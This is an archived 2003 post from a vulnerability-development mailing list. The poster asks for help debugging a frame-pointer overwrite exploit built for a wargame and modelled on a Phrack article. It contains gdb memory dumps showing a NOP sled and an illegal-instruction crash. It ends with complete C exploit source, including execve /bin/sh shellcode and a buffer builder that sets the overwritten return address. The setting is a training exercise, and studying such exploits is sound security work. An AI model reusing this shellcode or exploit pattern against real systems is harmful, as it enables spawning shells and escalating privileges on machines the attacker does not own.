Vulnerability Development mailing list archives
Illegal Instruction and Frame pointer overwriting
From: joe <moj0e () terra com br>
Date: Wed, 24 Sep 2003 09:19:14 -0300
Hello! It is great to such a mailing list as this! It's not too hot and not too cold!! Its just right!!
Anyway... I am having a problem developing an exploit for a wargame. The vuln is just like the one on: http://www.phrack.org/phrack/55/P55-08I even use the exploit provided since the vuln is almost identical to the one on the wargame. I am able to overwrite the last byte on EBP (I realize it adds 4 to it) and make it point to an address that will take me to the NOPS. From there it travels up the memory untill it hits a certain address and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault).
It tries to execute instruction 0xf798bfff which looks doesnt look right to me.(I am using Mandrake 9.1 on a x86) The vuln was compiled with gcc v2.9 or something... the one that makes it possible to exploit this kind of vuln. I am able to check execution flow by examining the memory (using the command x in gdb).
So I know that I am actually going to where I want (or think I want) to go. Any help is gratefully accepted! Attached is the exploit Here is some gdb output for you to chew on: (no debugging symbols found)... (gdb) run `./xp15` Breakpoint 1, 0x08048555 in main () (gdb) info reg esp esp 0xbffff78c 0xbffff78c (gdb) x 0xbffff78c 0xbffff78c: 0xbffff710 (gdb) x 0xbffff710 0xbffff710: 0x90909090 (gdb) c Continuing. Program received signal SIGILL, Illegal instruction. 0xbffff776 in ?? () (gdb) x 0xbffff776 0xbffff776: 0xf798bfff (gdb) x/100 0xbffff700 0xbffff700: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff720: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff730: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090 0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56 0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50 0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2 0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710 0xbffff790: 0x88888888 0x40155f50 0xbffff788 0x08048551 0xbffff7a0: 0x08048660 0xbffff804 0xbffff7b8 0x400508d9 0xbffff7b0: 0x40031038 0x40155f50 0xbffff7d8 0x4003b7f7 0xbffff7c0: 0x00000002 0xbffff804 0xbffff810 0x40012c10 0xbffff7d0: 0x00000002 0x08048380 0x00000000 0x080483a1 0xbffff7e0: 0x080484b0 0x00000002 0xbffff804 0x080482e0 0xbffff7f0: 0x08048590 0x4000abf0 0xbffff7fc 0x40012de0 0xbffff800: 0x00000002 0xbffff947 0xbffff961 0x00000000 0xbffff810: 0xbffffa63 0xbffffa76 0xbffffa85 0xbffffa96 0xbffff820: 0xbffffaa8 0xbffffac0 0xbffffacb 0xbffffadb 0xbffff830: 0xbffffae9 0xbffffb03 0xbffffb14 0xbffffb1d 0xbffff840: 0xbffffcfb 0xbffffd0e 0xbffffd1c 0xbffffd3c 0xbffff850: 0xbffffd67 0xbffffd80 0xbffffdfb 0xbffffe0d 0xbffff860: 0xbffffe19 0xbffffe35 0xbffffe44 0xbffffe5c 0xbffff870: 0xbffffe6d 0xbffffe82 0xbffffe9d 0xbffffed2 0xbffff880: 0xbffffedd 0xbffffef2 0xbfffff09 0xbfffff11 (gdb) (gdb)quit [blurb@wargame]$ fortune "The major difference between a thing that might go wrong and a thing that cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at or repair." -- One of the laws of computers and programming revealed. [blurb@wargame]$
#include <stdio.h> #include <unistd.h> char sc_linux[] = /*"\x31\xdb" "\x89\xd8" "\xb0\x17" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x2e" "\xcd\x80" "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\xb0\x01" "\xcd\x80"; */ // /*Original shell code.... "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; main() { int i, j, t; char buffer[1024]; bzero(&buffer, 1024); for (i=0;i<=(252-sizeof(sc_linux)-20);i++) { buffer[i] = 0x90; } for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++) { buffer[i] = sc_linux[j]; } for(t=0; t < 4;t++ ){ buffer[i++] = 0x10; // buffer[i++] = 0xf7; // Address of our buffer buffer[i++] = 0xff; // buffer[i++] = 0xbf; // } for(t=0; t < 9; t++) { buffer[i++] = 0x88; // overflowchar } printf("%s",buffer); //execl("./15", "./15", buffer, NULL); }
Current thread:
- Illegal Instruction and Frame pointer overwriting joe (Sep 24)